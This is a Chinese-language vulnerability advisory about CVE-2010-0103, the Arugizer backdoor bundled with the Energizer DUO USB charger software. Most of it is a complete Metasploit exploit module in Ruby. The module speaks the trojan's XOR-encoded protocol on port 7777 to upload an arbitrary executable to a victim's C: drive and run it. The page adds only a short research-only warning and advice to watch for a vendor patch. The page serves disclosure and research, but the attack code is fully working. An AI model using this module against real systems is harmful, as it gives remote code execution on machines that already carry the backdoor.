发布日期：2010-03-05
更新日期：2010-03-18

受影响系统：

Energizer Energizer DUO

描述：

---

BUGTRAQ  ID: 38571
CVE ID: CVE-2010-0103

Energizer DUO是快速USB充电器。

Energizer DUO在实现上存在安全漏洞，攻击者可利用此漏洞列出任意目录、发送和接收文件并执行任意代码。

<*来源：Ed Schaller
  
  链接：http://osvdb.org/show/osvdb/62782
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ed Schaller （）提供了如下测试方法：

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Energizer DUO Trojan Code Execution',
            'Description'    => %q{
                This module will execute an arbitrary payload against
            any system infected with the Arugizer trojan horse. This
            backdoor was shipped with the software package accompanying
            the Energizer Duo USB battery charger.
            },
            'Author'         => [ 'hdm' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 8749 $',
            'References'     =>
                [
                    ['CVE', '2010-0103'],
                    ['URL', 'http://www.kb.cert.org/vuls/id/154421']
                ],
            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Automatic', { } ],
                ],
            'DefaultTarget'  => 0
            ))


        register_options(
            [
                Opt::RPORT(7777),
            ], self.class)
    end

    def trojan_encode(str)
        str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
    end

    def trojan_command(cmd)
        cid = ""

        case cmd
        when :exec
            cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
        when :dir
            cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
        when :write
            cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
        when :read
            cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
        when :nop
            cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
        when :find
            cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
        when :yes
            cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
        when :runonce
            cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
        when :delete
            cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
        end

        trojan_encode(
            [cid.length + 1].pack("V") + cid  + "\x00"
        )
    end

    def exploit

        nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
        exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"


        print_status("Trying to upload #{nam}...")
        connect

        # Write file request
        sock.put(trojan_command(:write))
        sock.put(trojan_encode([nam.length].pack("V")))
        sock.put(trojan_encode(nam))
        sock.put(trojan_encode([exe.length].pack("V")))
        sock.put(trojan_encode(exe))

        # Required to prevent the server from spinning a loop
        sock.put(trojan_command(:nop))

        disconnect

        #
        # Execute the payload
        #

        print_status("Trying to execute #{nam}...")

        connect

        # Execute file request
        sock.put(trojan_command(:exec))
        sock.put(trojan_encode([nam.length].pack("V")))
        sock.put(trojan_encode(nam))

        # Required to prevent the server from spinning a loop
        sock.put(trojan_command(:nop))

        disconnect
    end
end

建议：

---

厂商补丁：

Energizer
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.energizer.com/Pages/default.aspx

浏览次数：1729
严重程度：0（网友投票）